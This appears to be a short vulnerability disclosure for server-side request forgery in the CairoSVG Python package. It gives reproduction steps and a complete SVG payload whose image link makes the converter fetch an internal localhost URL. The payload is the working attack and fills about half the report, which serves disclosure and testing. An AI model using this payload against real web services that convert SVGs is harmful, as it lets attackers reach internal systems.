CairoSVG

vulnerability ssrf
severity 4.7
language python
registry pypi

Description

CairoSVG is an SVG converter based on Cairo. It can export SVG files to PDF, EPS, PS, and PNG files. useing this package in webapps can be lead to SSRF attacks

Steps To Reproduce

  1. $ pip3 install cairosvg
  2. $ cairosvg payload.svg
  3. creat a payload svg or use : rc3.svg

rc3.svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200">
<image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg" stroke-width="1" id="image3204" />
<rect x="0" y="150" height="10" width="300" style="fill: black"/>
</svg>

POC

gdrive

💥 Impact

SSRF

References